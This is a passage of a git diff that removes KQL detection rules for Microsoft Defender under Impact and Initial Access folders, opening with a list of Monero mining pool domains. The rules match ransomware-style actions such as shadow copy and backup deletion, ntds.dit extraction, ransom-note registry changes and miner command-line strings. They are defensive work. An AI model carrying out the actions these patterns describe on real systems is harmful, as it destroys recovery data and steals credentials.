"us-west.minexmr.com", "us-zephyr.miningocean.org", "usxmrpool.com", "viaxmr.com", "webservicepag.webhop.net", "xiazai.monerpool.org", "xiazai1.monerpool.org", "xmc.pool.minergate.com", "xmo.pool.minergate.com", "xmr-asia1.nanopool.org", "xmr-au1.nanopool.org", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-jp1.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-us.suprnova.cc", "xmr-usa.dwarfpool.com", "xmr.2miners.com", "xmr.5b6b7b.ru", "xmr.alimabi.cn", "xmr.bohemianpool.com", "xmr.crypto-pool.fr", "xmr.crypto-pool.info", "xmr.f2pool.com", "xmr.hashcity.org", "xmr.hex7e4.ru", "xmr.ip28.net", "xmr.monerpool.org", "xmr.mypool.online", "xmr.nanopool.org", "xmr.pool.gntl.co.uk", "xmr.pool.minergate.com", "xmr.poolto.be", "xmr.ppxxmr.com", "xmr.prohash.net", "xmr.simka.pw", "xmr.somec.cc", "xmr.suprnova.cc", "xmr.usa-138.com", "xmr.vip.pool.minergate.com", "xmr1min.monerpool.org", "xmrf.520fjh.org", "xmrf.fjhan.club", "xmrfast.com", "xmrigcc.graef.in", "xmrminer.cc", "xmrpool.de", "xmrpool.eu", "xmrpool.me", "xmrpool.net", "xmrpool.xyz", "xx11m.monerpool.org", "xx11mv2.monerpool.org", "xxx.hex7e4.ru", "zarabotaibitok.ru", "zer0day.ru")
\ No newline at end of file
diff --git a/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql b/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql
deleted file mode 100644
index ef325b09..00000000
--- a/Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/04
-// Level: medium
-// Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
-// Tags: attack.impact, attack.t1490
-DeviceRegistryEvents
-| where RegistryValueData =~ "Binary Data" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" or RegistryKey contains "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates") and RegistryKey endswith "\\Blob"
\ No newline at end of file
diff --git a/Impact/Portable_Gpg.EXE_Execution.kql b/Impact/Portable_Gpg.EXE_Execution.kql
deleted file mode 100644
index a096491b..00000000
--- a/Impact/Portable_Gpg.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/06
-// Level: medium
-// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
-// Tags: attack.impact, attack.t1486
-DeviceProcessEvents
-| where ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoOriginalFileName =~ "gpg.exe" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (not((FolderPath contains ":\\Program Files (x86)\\GNU\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG VS-Desktop\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\Gpg4win\\bin\\")))
\ No newline at end of file
diff --git a/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql b/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
deleted file mode 100644
index 3f12168b..00000000
--- a/Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
-// Tags: attack.reconnaissance, attack.discovery, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Impact/Potential_Crypto_Mining_Activity.kql b/Impact/Potential_Crypto_Mining_Activity.kql
deleted file mode 100644
index db2ab577..00000000
--- a/Impact/Potential_Crypto_Mining_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/10/26
-// Level: high
-// Description: Detects command line parameters or strings often used by crypto miners
-// Tags: attack.impact, attack.t1496
-DeviceProcessEvents
-| where (ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL") and (not((ProcessCommandLine contains " pool.c " or ProcessCommandLine contains " pool.o " or ProcessCommandLine contains "gcc -")))
\ No newline at end of file
diff --git a/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql b/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql
deleted file mode 100644
index c44fdf46..00000000
--- a/Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/06/03
-// Level: high
-// Description: Detects the use of SDelete to erase a file not the free space
-// Tags: attack.impact, attack.t1485
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((ProcessCommandLine contains " -h" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " -z" or ProcessCommandLine contains " /?")))
\ No newline at end of file
diff --git a/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql b/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql
deleted file mode 100644
index d3f81814..00000000
--- a/Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
-// Tags: attack.impact, attack.t1491.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "encrypted" or RegistryValueData contains "Unlock-Password" or RegistryValueData contains "paying") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText")
\ No newline at end of file
diff --git a/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql b/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql
deleted file mode 100644
index 04a1ecbd..00000000
--- a/Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2"))
\ No newline at end of file
diff --git a/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql b/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql
deleted file mode 100644
index ea293a77..00000000
--- a/Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects regsitry value settings that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001
-DeviceRegistryEvents
-| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(InitiatingProcessFolderPath endswith "\\svchost.exe"))
\ No newline at end of file
diff --git a/Impact/Registry_Disable_System_Restore.kql b/Impact/Registry_Disable_System_Restore.kql
deleted file mode 100644
index 987d2564..00000000
--- a/Impact/Registry_Disable_System_Restore.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/04
-// Level: high
-// Description: Detects the modification of the registry to disable a system restore on the computer
-// Tags: attack.impact, attack.t1490
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore") and (RegistryKey endswith "DisableConfig" or RegistryKey endswith "DisableSR")
\ No newline at end of file
diff --git a/Impact/Renamed_Gpg.EXE_Execution.kql b/Impact/Renamed_Gpg.EXE_Execution.kql
deleted file mode 100644
index 8b2e50af..00000000
--- a/Impact/Renamed_Gpg.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023/08/09
-// Level: high
-// Description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
-// Tags: attack.impact, attack.t1486
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "gpg.exe" and (not((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe")))
\ No newline at end of file
diff --git a/Impact/Renamed_Sysinternals_Sdelete_Execution.kql b/Impact/Renamed_Sysinternals_Sdelete_Execution.kql
deleted file mode 100644
index 85f47581..00000000
--- a/Impact/Renamed_Sysinternals_Sdelete_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/06
-// Level: high
-// Description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)
-// Tags: attack.impact, attack.t1485
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe")))
\ No newline at end of file
diff --git a/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql b/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql
deleted file mode 100644
index 61901361..00000000
--- a/Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
-// Date: 2021/08/09
-// Level: high
-// Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" and (ProcessCommandLine contains "\\NTDS.dit" or ProcessCommandLine contains "\\SYSTEM" or ProcessCommandLine contains "\\SECURITY")
\ No newline at end of file
diff --git a/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql b/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
deleted file mode 100644
index ef8ae60e..00000000
--- a/Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
-// Date: 2019/10/22
-// Level: high
-// Description: Shadow Copies deletion using operating systems utilities
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE"))
\ No newline at end of file
diff --git a/Impact/Stop_Windows_Service_Via_Net.EXE.kql b/Impact/Stop_Windows_Service_Via_Net.EXE.kql
deleted file mode 100644
index b06abb2a..00000000
--- a/Impact/Stop_Windows_Service_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/05
-// Level: low
-// Description: Detects the stopping of a Windows service via the "net" utility.
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))
\ No newline at end of file
diff --git a/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql b/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql
deleted file mode 100644
index d8555ff2..00000000
--- a/Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/05
-// Level: low
-// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where ProcessCommandLine contains "Stop-Service " and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Impact/Stop_Windows_Service_Via_Sc.EXE.kql b/Impact/Stop_Windows_Service_Via_Sc.EXE.kql
deleted file mode 100644
index c9c45332..00000000
--- a/Impact/Stop_Windows_Service_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/05
-// Level: low
-// Description: Detects the stopping of a Windows service via the "sc.exe" utility
-// Tags: attack.impact, attack.t1489
-DeviceProcessEvents
-| where ProcessCommandLine contains " stop " and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe")
\ No newline at end of file
diff --git a/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql b/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql
deleted file mode 100644
index 14243c8b..00000000
--- a/Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/26
-// Level: high
-// Description: Ransomware create txt file in the user Desktop
-// Tags: attack.impact, attack.t1486
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\Desktop\\") and FolderPath endswith ".txt"
\ No newline at end of file
diff --git a/Impact/Suspicious_Execution_of_Shutdown.kql b/Impact/Suspicious_Execution_of_Shutdown.kql
deleted file mode 100644
index 1b1bcf08..00000000
--- a/Impact/Suspicious_Execution_of_Shutdown.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: medium
-// Description: Use of the commandline to shutdown or reboot windows
-// Tags: attack.impact, attack.t1529
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/r " or ProcessCommandLine contains "/s ") and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql b/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql
deleted file mode 100644
index 7c380a20..00000000
--- a/Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: medium
-// Description: Detects the rare use of the command line tool shutdown to logoff a user
-// Tags: attack.impact, attack.t1529
-DeviceProcessEvents
-| where ProcessCommandLine contains "/l" and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/Impact/Suspicious_Reg_Add_BitLocker.kql b/Impact/Suspicious_Reg_Add_BitLocker.kql
deleted file mode 100644
index 9acc3570..00000000
--- a/Impact/Suspicious_Reg_Add_BitLocker.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/15
-// Level: high
-// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
-// Tags: attack.impact, attack.t1486
-DeviceProcessEvents
-| where (ProcessCommandLine contains "EnableBDEWithNoTPM" or ProcessCommandLine contains "UseAdvancedStartup" or ProcessCommandLine contains "UseTPM" or ProcessCommandLine contains "UseTPMKey" or ProcessCommandLine contains "UseTPMKeyPIN" or ProcessCommandLine contains "RecoveryKeyMessageSource" or ProcessCommandLine contains "UseTPMPIN" or ProcessCommandLine contains "RecoveryKeyMessage") and (ProcessCommandLine contains "REG" and ProcessCommandLine contains "ADD" and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\FVE" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/f")
\ No newline at end of file
diff --git a/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql
deleted file mode 100644
index 714a3039..00000000
--- a/Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, @markus_neis
-// Date: 2021/07/07
-// Level: high
-// Description: Detects the image load of vss_ps.dll by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\"))))
\ No newline at end of file
diff --git a/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql
deleted file mode 100644
index 76697076..00000000
--- a/Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/31
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vssapi.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\" or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))))
\ No newline at end of file
diff --git a/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql b/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql
deleted file mode 100644
index ddc53c62..00000000
--- a/Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/02/17
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// Tags: attack.defense_evasion, attack.impact, attack.t1490
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vsstrace.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))))
\ No newline at end of file
diff --git a/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql b/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql
deleted file mode 100644
index 6e4d7eae..00000000
--- a/Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/13
-// Level: medium
-// Description: Detects the deletion of backups or system state backups via "wbadmin.exe".
-This technique is used by numerous ransomware families and actors.
-This may only be successful on server platforms that have Windows Backup enabled.
-
-// Tags: attack.impact, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) and (not(ProcessCommandLine contains "keepVersions:0"))
\ No newline at end of file
diff --git a/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql b/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql
deleted file mode 100644
index c2a5c681..00000000
--- a/Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/03/13
-// Level: medium
-// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
-// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial_access
-DeviceProcessEvents
-| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel"))
\ No newline at end of file
diff --git a/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
deleted file mode 100644
index 25771e32..00000000
--- a/Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/Initial Access/ISO_File_Created_Within_Temp_Folders.kql b/Initial Access/ISO_File_Created_Within_Temp_Folders.kql
deleted file mode 100644
index faa3924b..00000000
--- a/Initial Access/ISO_File_Created_Within_Temp_Folders.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @sam0x90
-// Date: 2022/07/30
-// Level: high
-// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where ((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".zip\\") and FolderPath endswith ".iso") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\" and FolderPath endswith ".iso")
\ No newline at end of file
diff --git a/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql b/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql
deleted file mode 100644
index ca6ce719..00000000
--- a/Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/11
-// Level: medium
-// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.
-This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
-
-// Tags: attack.initial_access, attack.t1566.001
-DeviceFileEvents
-| where FolderPath contains "\\Microsoft\\Windows\\Recent\\" and (FolderPath endswith ".iso.lnk" or FolderPath endswith ".img.lnk" or FolderPath endswith ".vhd.lnk" or FolderPath endswith ".vhdx.lnk")
\ No newline at end of file
diff --git a/Initial Access/Office_Macro_File_Creation.kql b/Initial Access/Office_Macro_File_Creation.kql
deleted file mode 100644
index befbebcf..00000000
